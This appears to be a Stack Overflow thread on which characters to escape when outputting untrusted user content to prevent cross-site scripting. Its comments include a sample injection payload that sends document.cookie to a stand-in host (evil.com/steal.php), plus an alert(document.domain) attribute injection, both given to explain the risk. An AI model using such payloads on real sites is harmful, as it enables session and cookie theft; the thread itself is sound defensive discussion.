views:

48

answers:

3

What are the characters that are required and suffice when escaping user-generated content before output? (in other words: what are the characters web developers should escape when outputting text that previously came from an untrusted, anonymous source?)

+4  A: 

When echoing to a page, you should encode

  • '&' (ampersand) becomes '&'
  • '"' (double quote) becomes '"'
  • ''' (single quote) becomes '''
  • '<' (less than) becomes '&lt;'
  • '>' (greater than) becomes '&gt;'

From PHP's htmlspecialchars() docs.

Note that the context also matters.

You'll also need to take the character set into account.

alex
What's the reason and/or need to escape quotes?
ChrisW
In case the text goes into an <input> tag, where it's placed in the value attribute, enclosed in quotes.
Alexander
@ChrisW I echo your name here `<input name="name" value="<?php echo $name; ?>">`. Now what if I entered my name as `alex" onfocus="window.location = 'http://www.evil.com/steal.php?cookie=' + encodeURI(document.cookie)`
alex
Thanks for your reply.
ChrisW
I also recommend escape anything that is not [a-zA-Z0-9]. Browsers will be able to represent properly and is not going to take you too much effort to implement it.
Pedro Laguna
@Pedro Laguna - If you mean for accented letters, etc., why not serve it as UTF?
ChrisW
@ChrisW no, I mean : ; , . / \ + = _ - # ! etc. You never know what the bad guys are going to discover to execute Javascript ;)
Pedro Laguna
@Pedro You mean you never know how IE can be tricked into executing JavaScript... I mean have you seen how the Samy worm was made? http://namb.la/popular/tech.html
alex
This answer is not what I wanted nor what I expected, but it is the most insightful one because it made me realize that the question is incomplete. Thank you, @alex
Tom
@alex yes, I read (and understand) the Samy code and the java\nsript trick. But other tricks can be discovered in other browsers too: http://sla.ckers.org/forum/read.php?24,33938,page=1
Pedro Laguna
@Pedo I know, I was just having a joke at IE's expense :D
alex
There are more characters, it all depends on where in the page input is displayed. For example if it is displayed inside JavaScript tags (<script></script>) or in CSS you have to worry about other characters. Check this link (Why Can't I Just HTML Entity Encode Untrusted Data?): http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
fms
@Pedro Wow, tested a few of them in my console and they are working with Firefox 3.6.3. Scary stuff... thanks for the link.
alex
A: 

I think that escaping the < > & " ' symbols should be enough for any scenario.

Alexander
These characters are not enough in some scenarios. Imagine the following code: <input type="text" value="asdf\" onclick=alert(document.domain); a=\""> Simply scape the double quotes does not helps you :)
Pedro Laguna
oh, yes, of course, I forgot the backslash. That's about it then :).
Alexander
A: 

Maybe this will help you

http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php

hex
Thanks, but that is a complete list. I don't want to escape everything, I want to escape as little as possible/needed.
Tom

related questions